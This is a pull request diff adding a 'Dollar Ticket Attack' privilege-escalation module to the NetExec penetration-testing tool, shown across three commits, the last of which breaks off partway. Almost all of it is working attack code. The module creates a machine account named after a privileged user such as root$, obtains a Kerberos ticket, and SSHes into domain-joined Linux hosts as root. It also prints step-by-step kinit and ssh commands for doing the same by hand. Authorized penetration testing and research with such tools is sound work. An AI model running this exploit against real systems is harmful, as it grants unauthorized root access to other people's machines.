### PR TITLE
Add Dollar Ticket Attack Module

### DIFF
--- a/nxc/modules/dollar-ticket.py
+++ b/nxc/modules/dollar-ticket.py
@@ -1,0 +1,432 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+"""
+Dollar Ticket Attack Module for NetExec
+Automates privilege escalation on Linux/Unix domain-joined systems
+
+Author: @bl4ckarch
+Based on: https://wiki.samba.org/index.php/Security/Dollar_Ticket_Attack
+CVEs: CVE-2020-25717, CVE-2020-25719, CVE-2021-42287
+"""
+
+import sys
+import subprocess
+import tempfile
+import os
+
+from impacket.dcerpc.v5 import samr, transport
+from impacket.ldap.ldap import LDAPSessionError
+from nxc.helpers.misc import CATEGORY
+
+
+class NXCModule:
+    """
+    Exploits the Dollar Ticket Attack against Linux/Unix domain-joined targets
+    
+    Creates a machine account with a privileged username (e.g., root$), then optionally
+    attempts to authenticate to the target via SSH using Kerberos GSSAPI. MIT Kerberos 
+    services strip the trailing '$' from machine accounts, allowing privilege escalation.
+    """
+
+    name = "dollar-ticket"
+    description = "Exploits Dollar Ticket Attack for privilege escalation on Linux/Unix targets credits to @bl4ckarch"
+    supported_protocols = ["smb", "ldap"]
+    category = CATEGORY.PRIVILEGE_ESCALATION
+    multiple_hosts = False
+
+    def options(self, context, module_options):
+        """
+        Dollar Ticket Attack options:
+        
+        TARGET_USER     Local privileged user to impersonate (default: root)
+        PASSWORD        Password for the machine account (default: random)
+        METHOD          Creation method: SAMR or LDAPS (default: SAMR)
+        SSH_TARGET      Target SSH host for automated exploitation (optional)
+        
+        Usage examples:
+            # Create machine account and get exploitation steps
+            nxc smb $DC_IP -u Username -p Password -M dollar-ticket -o TARGET_USER=root
+            
+            # With automated SSH exploitation
+            nxc smb $DC_IP -u Username -p Password -M dollar-ticket \\
+                -o TARGET_USER=root SSH_TARGET=192.168.1.50
+            
+            # Use LDAPS method
+            nxc ldap $DC_IP -u Username -p Password -M dollar-ticket \\
+                -o TARGET_USER=ubuntu METHOD=LDAPS SSH_TARGET=192.168.1.50
+        
+        Cleanup (when done):
+            nxc smb $DC_IP -u Username -p Password -M add-computer \\
+                -o NAME=root DELETE=True
+        """
+        self.target_user = module_options.get("TARGET_USER", "root")
+        self.password = module_options.get("PASSWORD", self._generate_password())
+        self.method = module_options.get("METHOD", "SAMR").upper()
+        self.ssh_target = module_options.get("SSH_TARGET", None)
+        
+        # Machine account name (without trailing $, added automatically)
+        self.computer_name = self.target_user
+        if self.computer_name.endswith("$"):
+            self.computer_name = self.computer_name[:-1]
+        
+        self.computer_name_full = f"{self.computer_name}$"
+        
+        if self.method not in ["SAMR", "LDAPS"]:
+            context.log.error("METHOD must be either SAMR or LDAPS")
+            sys.exit(1)
+
+    def on_login(self, context, connection):
+        """Main execution flow"""
+        self.context = context
+        self.connection = connection
+        
+        context.log.info(f"Starting Dollar Ticket Attack targeting local user '{self.target_user}'")
+        context.log.info(f"Machine account to create: {self.computer_name_full}")
+        
+        # Step 1: Create machine account
+        success = self._create_machine_account()
+        if not success:
+            return
+        
+        # Step 2: Attempt SSH exploitation if target specified
+        if self.ssh_target:
+            self._exploit_via_ssh()
+        else:
+            self._provide_manual_steps()
+
+    def _create_machine_account(self):
+        """Create machine account via SAMR or LDAPS"""
+        self.context.log.info(f"Creating machine account via {self.method}...")
+        
+        if self.method == "SAMR" and self.connection.args.protocol == "smb":
+            return self._create_via_samr()
+        elif self.method == "LDAPS" and self.connection.args.protocol == "ldap":
+            return self._create_via_ldap()
+        else:
+            self.context.log.error(f"Cannot use {self.method} with {self.connection.args.protocol} protocol")
+            self.context.log.error("Use: SAMR with SMB, or LDAPS with LDAP")
+            return False
+
+    def _create_via_samr(self):
+        """Create machine account via SAMR (SMB)"""
+        try:
+            conn = self.connection
+            rpc_transport = transport.SMBTransport(
+                conn.conn.getRemoteHost(), 
+                445, 
+                r"\samr", 
+                smb_connection=conn.conn
+            )
+            
+            dce = rpc_transport.get_dce_rpc()
+            dce.connect()
+            dce.bind(samr.MSRPC_UUID_SAMR)
+            
+            # Open domain
+            serv_handle = samr.hSamrConnect5(
+                dce, 
+                f"\\\\{conn.conn.getRemoteName()}\x00",
+                samr.SAM_SERVER_ENUMERATE_DOMAINS | samr.SAM_SERVER_LOOKUP_DOMAIN
+            )["ServerHandle"]
+            
+            domains = samr.hSamrEnumerateDomainsInSamServer(dce, serv_handle)["Buffer"]["Buffer"]
+            non_builtin = [d for d in domains if d["Name"].lower() != "builtin"]
+            
+            if len(non_builtin) > 1:
+                matched = [d for d in domains if d["Name"].lower() == self.connection.domain.lower()]
+                selected = matched[0]["Name"] if matched else non_builtin[0]["Name"]
+            else:
+                selected = non_builtin[0]["Name"]
+            
+            domain_sid = samr.hSamrLookupDomainInSamServer(dce, serv_handle, selected)["DomainId"]
+            domain_handle = samr.hSamrOpenDomain(
+                dce, 
+                serv_handle, 
+                samr.DOMAIN_LOOKUP | samr.DOMAIN_CREATE_USER, 
+                domain_sid
+            )["DomainHandle"]
+            
+            # Create computer account
+            try:
+                request = samr.SamrCreateUser2InDomain()
+                request["DomainHandle"] = domain_handle
+                request["Name"] = self.computer_name_full
+                request["AccountType"] = samr.USER_WORKSTATION_TRUST_ACCOUNT
+                request["DesiredAccess"] = samr.USER_FORCE_PASSWORD_CHANGE
+                user_handle = dce.request(request)["UserHandle"]
+                
+                # Set password
+                samr.hSamrSetPasswordInternal4New(dce, user_handle, self.password)
+                
+                # Set workstation trust account flag
+                user_rid = samr.hSamrLookupNamesInDomain(dce, domain_handle, [self.computer_name_full])["RelativeIds"]["Element"][0]
+                samr.hSamrCloseHandle(dce, user_handle)
+                user_handle = samr.hSamrOpenUser(dce, domain_handle, samr.MAXIMUM_ALLOWED, user_rid)["UserHandle"]
+                
+                req = samr.SAMPR_USER_INFO_BUFFER()
+                req["tag"] = samr.USER_INFORMATION_CLASS.UserControlInformation
+                req["Control"]["UserAccountControl"] = samr.USER_WORKSTATION_TRUST_ACCOUNT
+                samr.hSamrSetInformationUser2(dce, user_handle, req)
+                
+                samr.hSamrCloseHandle(dce, user_handle)
+                samr.hSamrCloseHandle(dce, domain_handle)
+                samr.hSamrCloseHandle(dce, serv_handle)
+                
+                self.context.log.success(f"Created machine account: {self.computer_name_full}")
+                self.context.log.success(f"Password: {self.password}")
+                return True
+                
+            except samr.DCERPCSessionError as e:
+                if "STATUS_USER_EXISTS" in str(e):
+                    self.context.log.error(f"Machine account '{self.computer_name_full}' already exists")
+                elif "STATUS_ACCESS_DENIED" in str(e):
+                    self.context.log.error("Access denied. Insufficient privileges.")
+                elif "STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED" in str(e):
+                    self.context.log.error("Machine account quota exceeded (MachineAccountQuota)")
+                else:
+                    self.context.log.error(f"Error creating machine account: {e}")
+                return False
+                
+        except Exception as e:
+            self.context.log.error(f"SAMR operation failed: {e}")
+            return False
+        finally:
+            try:
+                dce.disconnect()
+            except:
+                pass
+
+    def _create_via_ldap(self):
+        """Create machine account via LDAPS"""
+        try:
+            ldap_conn = self.connection.ldap_connection
+            name = self.computer_name
+            computer_dn = f"CN={name},CN=Computers,{self.connection.baseDN}"
+            fqdn = f"{name}.{self.connection.domain}"
+            
+            spns = [
+                f"HOST/{name}",
+                f"HOST/{fqdn}",
+                f"RestrictedKrbHost/{name}",
+                f"RestrictedKrbHost/{fqdn}",
+            ]
+            
+            ldap_conn.add(
+                computer_dn,
+                ["top", "person", "organizationalPerson", "user", "computer"],
+                {
+                    "dnsHostName": fqdn,
+                    "userAccountControl": 0x1000,  # WORKSTATION_TRUST_ACCOUNT
+                    "servicePrincipalName": spns,
+                    "sAMAccountName": self.computer_name_full,
+                    "unicodePwd": f'"{self.password}"'.encode("utf-16-le"),
+                },
+            )
+            
+            self.context.log.success(f"Created machine account: {self.computer_name_full}")
+            self.context.log.success(f"Password: {self.password}")
+            return True
+            
+        except LDAPSessionError as e:
+            if "entryAlreadyExists" in str(e):
+                self.context.log.error(f"Machine account '{self.computer_name_full}' already exists")
+            elif "insufficientAccessRights" in str(e):
+                self.context.log.error("Insufficient rights to create machine account")
+            elif "constraintViolation" in str(e):
+                self.context.log.error("Constraint violation (quota exceeded or password policy)")
+            else:
+                self.context.log.error(f"LDAP error: {e}")
+            return False
+
+    def _exploit_via_ssh(self):
+        """Automated exploitation via SSH with Kerberos"""
+        self.context.log.info(f"Attempting Kerberos authentication to {self.ssh_target}...")
+        
+        # Check if kinit/klist are available
+        if not self._check_kerberos_tools():
+            self.context.log.error("Kerberos tools (kinit/klist) not found. Install krb5-user package.")
+            self._provide_manual_steps()
+            return
+        
+        try:
+            # Obtain TGT for the machine account principal (without $)
+            # KDC will find root$ when root is requested
+            self.context.log.info(f"Requesting TGT for principal '{self.target_user}'...")
+            
+            # Create temporary krb5.conf with the domain
+            krb5_conf = self._create_krb5_conf()
+            
+            env = os.environ.copy()
+            env["KRB5_CONFIG"] = krb5_conf
+            
+            # Use echo to pipe password to kinit
+            kinit_cmd = f"echo '{self.password}' | kinit {self.target_user}@{self.connection.domain.upper()}"
+            result = subprocess.run(
+                kinit_cmd,
+                shell=True,
+                env=env,
+                capture_output=True,
+                text=True,
+                timeout=10
+            )
+            
+            if result.returncode != 0:
+                self.context.log.error(f"kinit failed: {result.stderr}")
+                self._provide_manual_steps()
+                return
+            
+            self.context.log.success("TGT obtained successfully")
+            
+            # Verify ticket
+            klist_result = subprocess.run(
+                ["klist"],
+                env=env,
+                capture_output=True,
+                text=True
+            )
+            
+            if self.target_user in klist_result.stdout or self.computer_name_full in klist_result.stdout:
+                self.context.log.info("Ticket cache contents:")
+                for line in klist_result.stdout.split('\n')[:5]:
+                    if line.strip():
+                        self.context.log.info(f"  {line}")
+            
+            # Attempt SSH with GSSAPI
+            self.context.log.info(f"Attempting SSH to {self.ssh_target} as '{self.target_user}'...")
+            
+            ssh_cmd = [
+                "ssh",
+                "-o", "PreferredAuthentications=gssapi-with-mic",
+                "-o", "GSSAPIAuthentication=yes",
+                "-o", "StrictHostKeyChecking=no",
+                "-o", "UserKnownHostsFile=/dev/null",
+                "-l", self.target_user,
+                self.ssh_target,
+                "id"
+            ]
+            
+            ssh_result = subprocess.run(
+                ssh_cmd,
+                env=env,
+                capture_output=True,
+                text=True,
+                timeout=15
+            )
+            
+            if ssh_result.returncode == 0:
+                self.context.log.success(f"PRIVILEGE ESCALATION SUCCESSFUL!")
+                self.context.log.success(f"Authenticated as '{self.target_user}' on {self.ssh_target}")
+                self.context.log.success(f"Output: {ssh_result.stdout.strip()}")
+                self.context.log.info("")
+                self.context.log.info("Cleanup (when done):")
+                self.context.log.info(f"  nxc smb {self.connection.host} -u {self.connection.username} -p <password> \\")
+                self.context.log.info(f"      -M add-computer -o NAME={self.computer_name} DELETE=True")
+            else:
+                self.context.log.error(f"SSH authentication failed: {ssh_result.stderr}")
+                self.context.log.error("Possible reasons:")
+                self.context.log.error("  - PAC validation is enabled on target")
+                self.context.log.error("  - PermitRootLogin is disabled")
+                self.context.log.error("  - GSSAPI authentication is disabled")
+                self._provide_manual_steps()
+            
+            # Cleanup Kerberos ticket
+            subprocess.run(["kdestroy"], env=env, capture_output=True)
+            
+            # Remove temporary krb5.conf
+            try:
+                os.unlink(krb5_conf)
+            except:
+                pass
+                
+        except subprocess.TimeoutExpired:
+            self.context.log.error("Operation timed out")
+            self._provide_manual_steps()
+        except Exception as e:
+            self.context.log.error(f"Exploitation failed: {e}")
+            self._provide_manual_steps()
+
+    def _provide_manual_steps(self):
+        """Provide manual exploitation steps"""
+        self.context.log.info("\n" + "="*70)
+        self.context.log.info("EXPLOITATION STEPS")
+        self.context.log.info("="*70)
+        self.context.log.info(f"Machine account created: {self.computer_name_full}")
+        self.context.log.info(f"Password: {self.password}")
+        self.context.log.info(f"Domain: {self.connection.domain.upper()}")
+        self.context.log.info("")
+        self.context.log.info("1. Obtain Kerberos ticket:")
+        self.context.log.info(f"   kinit {self.target_user}@{self.connection.domain.upper()}")
+        self.context.log.info(f"   # Password: {self.password}")
+        self.context.log.info("")
+        self.context.log.info("2. Authenticate to target Linux/Unix host:")
+        if self.ssh_target:
+            self.context.log.info(f"   ssh -o PreferredAuthentications=gssapi-with-mic -l {self.target_user} {self.ssh_target}")
+        else:
+            self.context.log.info(f"   ssh -o PreferredAuthentications=gssapi-with-mic -l {self.target_user} <target_ip>")
+        self.context.log.info("")
+        self.context.log.info("3. Verify privilege escalation:")
+        self.context.log.info("   id")
+        self.context.log.info("   whoami")
+        self.context.log.info("")
+        self.context.log.info("Note: KDC issues ticket for '{}' when '{}' is requested".format(
+            self.computer_name_full, self.target_user))
+        self.context.log.info("      MIT Kerberos on target maps '{}' -> '{}'".format(
+            self.computer_name_full, self.target_user))
+        self.context.log.info("")
+        self.context.log.info("CLEANUP (when done):")
+        self.context.log.info("  nxc smb {} -u {} -p <password> \\".format(
+            self.connection.host, self.connection.username))
+        self.context.log.info(f"      -M add-computer -o NAME={self.computer_name} DELETE=True")
+        self.context.log.info("="*70 + "\n")
+
+    def _check_kerberos_tools(self):
+        """Check if kinit and klist are available"""
+        try:
+            subprocess.run(["kinit", "--version"], capture_output=True, timeout=5)
+            subprocess.run(["klist", "--version"], capture_output=True, timeout=5)
+            return True
+        except (FileNotFoundError, subprocess.TimeoutExpired):
+            return False
+
+    def _create_krb5_conf(self):
+        """Create temporary krb5.conf for the domain"""
+        krb5_content = f"""[libdefaults]
+    default_realm = {self.connection.domain.upper()}
+    dns_lookup_realm = true
+    dns_lookup_kdc = true
+
+[realms]
+    {self.connection.domain.upper()} = {{
+        kdc = {self.connection.host}
+        admin_server = {self.connection.host}
+    }}
+
+[domain_realm]
+    .{self.connection.domain.lower()} = {self.connection.domain.upper()}
+    {self.connection.domain.lower()} = {self.connection.domain.upper()}
+"""
+        
+        with tempfile.NamedTemporaryFile(mode='w', delete=False, suffix='.conf') as f:
+            f.write(krb5_content)
+            return f.name
+
+    @staticmethod
+    def _generate_password():
+        """Generate a random complex password"""
+        import random
+        import string
+        
+        chars = string.ascii_letters + string.digits + "!@#$%^&*"
+        password = ''.join(random.choice(chars) for _ in range(16))
+        
+        # Ensure complexity
+        if not any(c.isupper() for c in password):
+            password = password[0].upper() + password[1:]
+        if not any(c.islower() for c in password):
+            password = password[0].lower() + password[1:]
+        if not any(c.isdigit() for c in password):
+            password = password[:-1] + '1'
+        if not any(c in "!@#$%^&*" for c in password):
+            password = password[:-1] + '!'
+        
+        return password

--- a/nxc/modules/dollar-ticket.py
+++ b/nxc/modules/dollar-ticket.py
@@ -1,5 +1,4 @@
 #!/usr/bin/env python3
-# -*- coding: utf-8 -*-
 """
 Dollar Ticket Attack Module for NetExec
 Automates privilege escalation on Linux/Unix domain-joined systems
@@ -9,10 +8,11 @@ Based on: https://wiki.samba.org/index.php/Security/Dollar_Ticket_Attack
 CVEs: CVE-2020-25717, CVE-2020-25719, CVE-2021-42287
 """
 
-import sys
-import subprocess
-import tempfile
+import contextlib
 import os
+import subprocess
+import sys
+import tempfile
 
 from impacket.dcerpc.v5 import samr, transport
 from impacket.ldap.ldap import LDAPSessionError
@@ -22,9 +22,9 @@ from nxc.helpers.misc import CATEGORY
 class NXCModule:
     """
     Exploits the Dollar Ticket Attack against Linux/Unix domain-joined targets
-    
+
     Creates a machine account with a privileged username (e.g., root$), then optionally
-    attempts to authenticate to the target via SSH using Kerberos GSSAPI. MIT Kerberos 
+    attempts to authenticate to the target via SSH using Kerberos GSSAPI. MIT Kerberos
     services strip the trailing '$' from machine accounts, allowing privilege escalation.
     """
 
@@ -35,42 +35,42 @@ class NXCModule:
     multiple_hosts = False
 
     def options(self, context, module_options):
-        """
+        r"""
         Dollar Ticket Attack options:
-        
+
         TARGET_USER     Local privileged user to impersonate (default: root)
         PASSWORD        Password for the machine account (default: random)
         METHOD          Creation method: SAMR or LDAPS (default: SAMR)
         SSH_TARGET      Target SSH host for automated exploitation (optional)
-        
+
         Usage examples:
             # Create machine account and get exploitation steps
             nxc smb $DC_IP -u Username -p Password -M dollar-ticket -o TARGET_USER=root
-            
+
             # With automated SSH exploitation
-            nxc smb $DC_IP -u Username -p Password -M dollar-ticket \\
+            nxc smb $DC_IP -u Username -p Password -M dollar-ticket \
                 -o TARGET_USER=root SSH_TARGET=192.168.1.50
-            
+
             # Use LDAPS method
-            nxc ldap $DC_IP -u Username -p Password -M dollar-ticket \\
+            nxc ldap $DC_IP -u Username -p Password -M dollar-ticket \
                 -o TARGET_USER=ubuntu METHOD=LDAPS SSH_TARGET=192.168.1.50
-        
+
         Cleanup (when done):
-            nxc smb $DC_IP -u Username -p Password -M add-computer \\
+            nxc smb $DC_IP -u Username -p Password -M add-computer \
                 -o NAME=root DELETE=True
         """
         self.target_user = module_options.get("TARGET_USER", "root")
         self.password = module_options.get("PASSWORD", self._generate_password())
         self.method = module_options.get("METHOD", "SAMR").upper()
         self.ssh_target = module_options.get("SSH_TARGET", None)
-        
+
         # Machine account name (without trailing $, added automatically)
         self.computer_name = self.target_user
         if self.computer_name.endswith("$"):
             self.computer_name = self.computer_name[:-1]
-        
+
         self.computer_name_full = f"{self.computer_name}$"
-        
+
         if self.method not in ["SAMR", "LDAPS"]:
             context.log.error("METHOD must be either SAMR or LDAPS")
             sys.exit(1)
@@ -79,15 +79,15 @@ class NXCModule:
         """Main execution flow"""
         self.context = context
         self.connection = connection
-        
+
         context.log.info(f"Starting Dollar Ticket Attack targeting local user '{self.target_user}'")
         context.log.info(f"Machine account to create: {self.computer_name_full}")
-        
+
         # Step 1: Create machine account
         success = self._create_machine_account()
         if not success:
             return
-        
+
         # Step 2: Attempt SSH exploitation if target specified
         if self.ssh_target:
             self._exploit_via_ssh()
@@ -97,7 +97,7 @@ class NXCModule:
     def _create_machine_account(self):
         """Create machine account via SAMR or LDAPS"""
         self.context.log.info(f"Creating machine account via {self.method}...")
-        
+
         if self.method == "SAMR" and self.connection.args.protocol == "smb":
             return self._create_via_samr()
         elif self.method == "LDAPS" and self.connection.args.protocol == "ldap":
@@ -112,40 +112,40 @@ class NXCModule:
         try:
             conn = self.connection
             rpc_transport = transport.SMBTransport(
-                conn.conn.getRemoteHost(), 
-                445, 
-                r"\samr", 
+                conn.conn.getRemoteHost(),
+                445,
+                r"\samr",
                 smb_connection=conn.conn
             )
-            
+
             dce = rpc_transport.get_dce_rpc()
             dce.connect()
             dce.bind(samr.MSRPC_UUID_SAMR)
-            
+
             # Open domain
             serv_handle = samr.hSamrConnect5(
-                dce, 
+                dce,
                 f"\\\\{conn.conn.getRemoteName()}\x00",
                 samr.SAM_SERVER_ENUMERATE_DOMAINS | samr.SAM_SERVER_LOOKUP_DOMAIN
             )["ServerHandle"]
-            
+
             domains = samr.hSamrEnumerateDomainsInSamServer(dce, serv_handle)["Buffer"]["Buffer"]
             non_builtin = [d for d in domains if d["Name"].lower() != "builtin"]
-            
+
             if len(non_builtin) > 1:
                 matched = [d for d in domains if d["Name"].lower() == self.connection.domain.lower()]
                 selected = matched[0]["Name"] if matched else non_builtin[0]["Name"]
             else:
                 selected = non_builtin[0]["Name"]
-            
+
             domain_sid = samr.hSamrLookupDomainInSamServer(dce, serv_handle, selected)["DomainId"]
             domain_handle = samr.hSamrOpenDomain(
-                dce, 
-                serv_handle, 
-                samr.DOMAIN_LOOKUP | samr.DOMAIN_CREATE_USER, 
+                dce,
+                serv_handle,
+                samr.DOMAIN_LOOKUP | samr.DOMAIN_CREATE_USER,
                 domain_sid
             )["DomainHandle"]
-            
+
             # Create computer account
             try:
                 request = samr.SamrCreateUser2InDomain()
@@ -154,28 +154,28 @@ class NXCModule:
                 request["AccountType"] = samr.USER_WORKSTATION_TRUST_ACCOUNT
                 request["DesiredAccess"] = samr.USER_FORCE_PASSWORD_CHANGE
                 user_handle = dce.request(request)["UserHandle"]
-                
+
                 # Set password
                 samr.hSamrSetPasswordInternal4New(dce, user_handle, self.password)
-                
+
                 # Set workstation trust account flag
                 user_rid = samr.hSamrLookupNamesInDomain(dce, domain_handle, [self.computer_name_full])["RelativeIds"]["Element"][0]
                 samr.hSamrCloseHandle(dce, user_handle)
                 user_handle = samr.hSamrOpenUser(dce, domain_handle, samr.MAXIMUM_ALLOWED, user_rid)["UserHandle"]
-                
+
                 req = samr.SAMPR_USER_INFO_BUFFER()
                 req["tag"] = samr.USER_INFORMATION_CLASS.UserControlInformation
                 req["Control"]["UserAccountControl"] = samr.USER_WORKSTATION_TRUST_ACCOUNT
                 samr.hSamrSetInformationUser2(dce, user_handle, req)
-                
+
                 samr.hSamrCloseHandle(dce, user_handle)
                 samr.hSamrCloseHandle(dce, domain_handle)
                 samr.hSamrCloseHandle(dce, serv_handle)
-                
+
                 self.context.log.success(f"Created machine account: {self.computer_name_full}")
                 self.context.log.success(f"Password: {self.password}")
                 return True
-                
+
             except samr.DCERPCSessionError as e:
                 if "STATUS_USER_EXISTS" in str(e):
                     self.context.log.error(f"Machine account '{self.computer_name_full}' already exists")
@@ -186,15 +186,13 @@ class NXCModule:
                 else:
                     self.context.log.error(f"Error creating machine account: {e}")
                 return False
-                
+
         except Exception as e:
             self.context.log.error(f"SAMR operation failed: {e}")
             return False
         finally:
-            try:
+            with contextlib.suppress(Exception):
                 dce.disconnect()
-            except:
-                pass
 
     def _create_via_ldap(self):
         """Create machine account via LDAPS"""
@@ -203,14 +201,14 @@ class NXCModule:
             name = self.computer_name
             computer_dn = f"CN={name},CN=Computers,{self.connection.baseDN}"
             fqdn = f"{name}.{self.connection.domain}"
-            
+
             spns = [
                 f"HOST/{name}",
                 f"HOST/{fqdn}",
                 f"RestrictedKrbHost/{name}",
                 f"RestrictedKrbHost/{fqdn}",
             ]
-            
+
             ldap_conn.add(
                 computer_dn,
                 ["top", "person", "organizationalPerson", "user", "computer"],
@@ -222,11 +220,11 @@ class NXCModule:
                     "unicodePwd": f'"{self.password}"'.encode("utf-16-le"),
                 },
             )
-            
+
             self.context.log.success(f"Created machine account: {self.computer_name_full}")
             self.context.log.success(f"Password: {self.password}")
             return True
-            
+
         except LDAPSessionError as e:
             if "entryAlreadyExists" in str(e):
                 self.context.log.error(f"Machine account '{self.computer_name_full}' already exists")
@@ -241,24 +239,24 @@ class NXCModule:
     def _exploit_via_ssh(self):
         """Automated exploitation via SSH with Kerberos"""
         self.context.log.info(f"Attempting Kerberos authentication to {self.ssh_target}...")
-        
+
         # Check if kinit/klist are available
         if not self._check_kerberos_tools():
             self.context.log.error("Kerberos tools (kinit/klist) not found. Install krb5-user package.")
             self._provide_manual_steps()
             return
-        
+
         try:
             # Obtain TGT for the machine account principal (without $)
             # KDC will find root$ when root is requested
             self.context.log.info(f"Requesting TGT for principal '{self.target_user}'...")
-            
+
             # Create temporary krb5.conf with the domain
             krb5_conf = self._create_krb5_conf()
-            
+
             env = os.environ.copy()
             env["KRB5_CONFIG"] = krb5_conf
-            
+
             # Use echo to pipe password to kinit
             kinit_cmd = f"echo '{self.password}' | kinit {self.target_user}@{self.connection.domain.upper()}"
             result = subprocess.run(
@@ -269,14 +267,14 @@ class NXCModule:
                 text=True,
                 timeout=10
             )
-            
+
             if result.returncode != 0:
                 self.context.log.error(f"kinit failed: {result.stderr}")
                 self._provide_manual_steps()
                 return
-            
+
             self.context.log.success("TGT obtained successfully")
-            
+
             # Verify ticket
             klist_result = subprocess.run(
                 ["klist"],
@@ -284,16 +282,16 @@ class NXCModule:
                 capture_output=True,
                 text=True
             )
-            
+
             if self.target_user in klist_result.stdout or self.computer_name_full in klist_result.stdout:
                 self.context.log.info("Ticket cache contents:")
-                for line in klist_result.stdout.split('\n')[:5]:
+                for line in klist_result.stdout.split("\n")[:5]:
                     if line.strip():
                         self.context.log.info(f"  {line}")
-            
+
             # Attempt SSH with GSSAPI
             self.context.log.info(f"Attempting SSH to {self.ssh_target} as '{self.target_user}'...")
-            
+
             ssh_cmd = [
                 "ssh",
                 "-o", "PreferredAuthentications=gssapi-with-mic",
@@ -304,7 +302,7 @@ class NXCModule:
                 self.ssh_target,
                 "id"
             ]
-            
+
             ssh_result = subprocess.run(
                 ssh_cmd,
                 env=env,
@@ -312,9 +310,9 @@ class NXCModule:
                 text=True,
                 timeout=15
             )
-            
+
             if ssh_result.returncode == 0:
-                self.context.log.success(f"PRIVILEGE ESCALATION SUCCESSFUL!")
+                self.context.log.success("PRIVILEGE ESCALATION SUCCESSFUL!")
                 self.context.log.success(f"Authenticated as '{self.target_user}' on {self.ssh_target}")
                 self.context.log.success(f"Output: {ssh_result.stdout.strip()}")
                 self.context.log.info("")
@@ -328,16 +326,14 @@ class NXCModule:
                 self.context.log.error("  - PermitRootLogin is disabled")
                 self.context.log.error("  - GSSAPI authentication is disabled")
                 self._provide_manual_steps()
-            
+
             # Cleanup Kerberos ticket
             subprocess.run(["kdestroy"], env=env, capture_output=True)
-            
+
             # Remove temporary krb5.conf
-            try:
+            with contextlib.suppress(Exception):
                 os.unlink(krb5_conf)
-            except:
-                pass
-                
+
         except subprocess.TimeoutExpired:
             self.context.log.error("Operation timed out")
             self._provide_manual_steps()
@@ -405,8 +401,8 @@ class NXCModule:
     .{self.connection.domain.lower()} = {self.connection.domain.upper()}
     {self.connection.domain.lower()} = {self.connection.domain.upper()}
 """
-        
-        with tempfile.NamedTemporaryFile(mode='w', delete=False, suffix='.conf') as f:
+
+        with tempfile.NamedTemporaryFile(mode="w", delete=False, suffix=".conf") as f:
             f.write(krb5_content)
             return f.name
 
@@ -415,18 +411,18 @@ class NXCModule:
         """Generate a random complex password"""
         import random
         import string
-        
+
         chars = string.ascii_letters + string.digits + "!@#$%^&*"
-        password = ''.join(random.choice(chars) for _ in range(16))
-        
+        password = "".join(random.choice(chars) for _ in range(16))
+
         # Ensure complexity
         if not any(c.isupper() for c in password):
             password = password[0].upper() + password[1:]
         if not any(c.islower() for c in password):
             password = password[0].lower() + password[1:]
         if not any(c.isdigit() for c in password):
-            password = password[:-1] + '1'
+            password = password[:-1] + "1"
         if not any(c in "!@#$%^&*" for c in password):
-            password = password[:-1] + '!'
-        
+            password = password[:-1] + "!"
+
         return password

--- a/nxc/modules/dollar-ticket.py
+++ b/nxc/modules/dollar-ticket.py
@@ -1,31 +1,28 @@
 #!/usr/bin/env python3
 """
 Dollar Ticket Attack Module for NetExec
-Automates privilege escalation on Linux/Unix domain-joined systems
+Fully automates privilege escalation on Linux/Unix domain-joined systems
 
 Author: @bl4ckarch
-Based on: https://wiki.samba.org/index.php/Security/Dollar_Ticket_Attack
 CVEs: CVE-2020-25717, CVE-2020-25719, CVE-2021-42287
 """
 
-import contextlib
-import os
-import subprocess
-import sys
-import tempfile
+import importlib
 
-from impacket.dcerpc.v5 import samr, transport
-from impacket.ldap.ldap import LDAPSessionError
+from impacket.krb5.ccache import CCache
+from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS
+from impacket.krb5.types import Principal
+from impacket.krb5 import constants
+
 from nxc.helpers.misc import CATEGORY
 
 
 class NXCModule:
     """
-    Exploits the Dollar Ticket Attack against Linux/Unix domain-joined targets
+    Dollar Ticket Attack
 
-    Creates a machine account with a privileged username (e.g., root$), then optionally
-    attempts to authenticate to the target via SSH using Kerberos GSSAPI. MIT Kerberos
-    services strip the trailing '$' from machine accounts, allowing privilege escalation.
+    Creates machine account, obtains TGT, then requests Service Ticket for SSH.
+    MIT Kerberos maps root$ to root during authentication.
     """
 
     name = "dollar-ticket"
@@ -36,372 +33,171 @@ class NXCModule:
 
     def options(self, context, module_options):
         r"""
-        Dollar Ticket Attack options:
-
         TARGET_USER     Local privileged user to impersonate (default: root)
-        PASSWORD        Password for the machine account (default: random)
-        METHOD          Creation method: SAMR or LDAPS (default: SAMR)
-        SSH_TARGET      Target SSH host for automated exploitation (optional)
+        PASSWORD        Machine account password (default: random)
+        TGT_PATH        Path to save ccache file (default: /tmp/dollar_ticket.ccache)
+        SSH_TARGET      Target Linux/Unix host (REQUIRED for ST generation) FQDN
 
-        Usage examples:
-            # Create machine account and get exploitation steps
-            nxc smb $DC_IP -u Username -p Password -M dollar-ticket -o TARGET_USER=root
+        Usage:
+            nxc smb DC -u user -p pass -M dollar-ticket -o TARGET_USER=root SSH_TARGET=syrax.dracarys.lab
 
-            # With automated SSH exploitation
-            nxc smb $DC_IP -u Username -p Password -M dollar-ticket \
-                -o TARGET_USER=root SSH_TARGET=192.168.1.50
-
-            # Use LDAPS method
-            nxc ldap $DC_IP -u Username -p Password -M dollar-ticket \
-                -o TARGET_USER=ubuntu METHOD=LDAPS SSH_TARGET=192.168.1.50
-
-        Cleanup (when done):
-            nxc smb $DC_IP -u Username -p Password -M add-computer \
-                -o NAME=root DELETE=True
+        Fully automated:
+        1. Creates machine account (root$) via add-computer
+        2. Obtains TGT for 'root' (KDC fallback to root$)
+        3. Requests Service Ticket for host/target
+        4. Saves complete ccache with TGT + ST
         """
         self.target_user = module_options.get("TARGET_USER", "root")
         self.password = module_options.get("PASSWORD", self._generate_password())
-        self.method = module_options.get("METHOD", "SAMR").upper()
-        self.ssh_target = module_options.get("SSH_TARGET", None)
+        self.tgt_path = module_options.get("TGT_PATH", "/tmp/dollar_ticket.ccache")
+        self.ssh_target = module_options.get("SSH_TARGET")
 
-        # Machine account name (without trailing $, added automatically)
+        if not self.ssh_target:
+            context.log.error("SSH_TARGET is required to generate Service Ticket")
+            context.log.error("Example: -o SSH_TARGET=192.168.1.100")
+            return
+
+        if self.target_user.endswith("$"):
+            self.target_user = self.target_user[:-1]
+
         self.computer_name = self.target_user
-        if self.computer_name.endswith("$"):
-            self.computer_name = self.computer_name[:-1]
-
         self.computer_name_full = f"{self.computer_name}$"
 
-        if self.method not in ["SAMR", "LDAPS"]:
-            context.log.error("METHOD must be either SAMR or LDAPS")
